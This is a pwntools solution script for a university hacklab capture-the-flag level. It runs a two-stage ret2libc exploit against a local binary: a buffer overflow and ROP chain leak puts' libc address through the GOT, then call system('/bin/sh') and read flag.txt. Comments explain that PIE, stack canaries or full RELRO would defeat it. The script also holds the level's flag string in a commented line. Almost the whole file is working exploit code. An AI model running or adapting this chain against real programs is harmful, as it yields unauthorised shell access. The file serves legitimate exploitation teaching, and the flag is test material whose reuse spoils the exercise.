
# 0x0000000000401263 : pop rdi ; ret
#
# Solution script for the hacklab "level9" exercise: a two-stage ret2libc
# against a local copy of ./level9.  Stage 1 overflows the input buffer and
# returns into puts() with the GOT slot of puts as its argument, so the
# program prints the resolved libc address of puts; stage 2 reuses that leak
# to compute the libc base and call system("/bin/sh").
#
# The chain only works because the gadget, PLT and GOT addresses used below
# are fixed (non-PIE binary) and the saved return address can be reached by a
# plain overflow (no stack canary) -- NOTE(review): confirm with checksec;
# PIE, a canary, or full RELRO would each defeat a step of this chain, which
# is the defensive lesson of the level.
from pwn import *
HOST, PORT = "localhost", 4009
#HOST, PORT = "binexp.stud12.hacklab.ias.tu-bs.de", 4009
#p = remote(HOST, PORT)
# The target is run locally; the remote variant above is left commented out.
p = process('./level9')
#question = p.recvline(timeout=2)
#print("[+] question:", question.decode().strip())
#
#question = p.recvline(timeout=2)
#print("[+] question:", question.decode().strip())
#
#payload = "hacklab{ret2libc_1s_p0w3rful_urPDIYAb}"
#p.sendline(payload.encode())
#print("sending: ", end='')
#print(payload)
#
#question = p.recvline(timeout=2)
#print("[+] question:", question.decode().strip())
#
#question = p.recvline(timeout=2)
#print("[+] question:", question.decode().strip())
# Offsets taken from the libc on this machine.  They are only meaningful if
# the target process loads this exact libc build (true for a local process;
# a remote target may run a different libc, in which case the stage-2
# addresses would be wrong).
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
puts_offset = libc.symbols['puts'] # e.g. 0x080aa0
system_offset = libc.symbols['system'] # e.g. 0x04f550
binsh_offset = next(libc.search(b'/bin/sh')) # e.g. 0x1b75aa
print(hex(puts_offset))
print(hex(system_offset))
print(hex(binsh_offset))
# Static addresses read from the target binary: the PLT stub and GOT slot
# for puts, and main (used to restart the program for the second input).
elf = ELF('./level9')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main = elf.symbols['main']
#help_input = p.recvline()
#print(help_input)
#puts_abs = int(help_input[-15:-1],16)
#print(hex(puts_abs))
# Stage 1: leak the runtime address of puts through the GOT.
p.recvuntil("What do you want to talk about?".encode())
payload = b'A'*40                   # presumably the distance from the buffer to the saved return address -- verify
payload += p64(0x0000000000401264)  # likely the lone `ret` of the gadget below, used for stack alignment -- TODO confirm
payload += p64(0x0000000000401263)  # pop rdi ; ret
payload += p64(puts_got)            # rdi = address of the GOT slot of puts
payload += p64(puts_plt)            # puts(rdi): prints the resolved puts address
payload += p64(main)                # return into main so a second payload can be sent
p.sendline(payload)
print("send payload: ", payload)
# NOTE(review): assumes exactly two lines of normal program output precede
# the leaked address; the third line read is the one decoded below.
leak = p.recvline(timeout=999)
print("[+] line:", leak)
leak = p.recvline(timeout=999)
print("[+] line:", leak)
leak = p.recvline(timeout=999)
print("[+] line:", leak)
# puts() prints the address bytes up to the first NUL, followed by a newline
# that recvline keeps; strip the newline and decode the bytes little-endian.
puts_abs = int.from_bytes(leak[:-1], 'little')
print("[+] leaked puts:", hex(puts_abs))
# Stage 2: libc base = puts_abs - puts_offset; rebase the two libc offsets
# and call system("/bin/sh") through the same pop-rdi gadget.
p.recvuntil("What do you want to talk about?".encode())
payload = b'A'*40
#payload += p64(0x0000000000401264)
# No extra `ret` in this stage -- presumably the stack alignment differs from
# stage 1 after returning through main; confirm if the call to system crashes.
payload += p64(0x0000000000401263)                      # pop rdi ; ret
payload += p64(puts_abs - puts_offset + binsh_offset)   # rdi = "/bin/sh" inside libc
payload += p64(puts_abs - puts_offset + system_offset)  # system(rdi)
p.sendline(payload)
print("payload: ",payload)
p.sendline("cat flag.txt".encode())
p.interactive()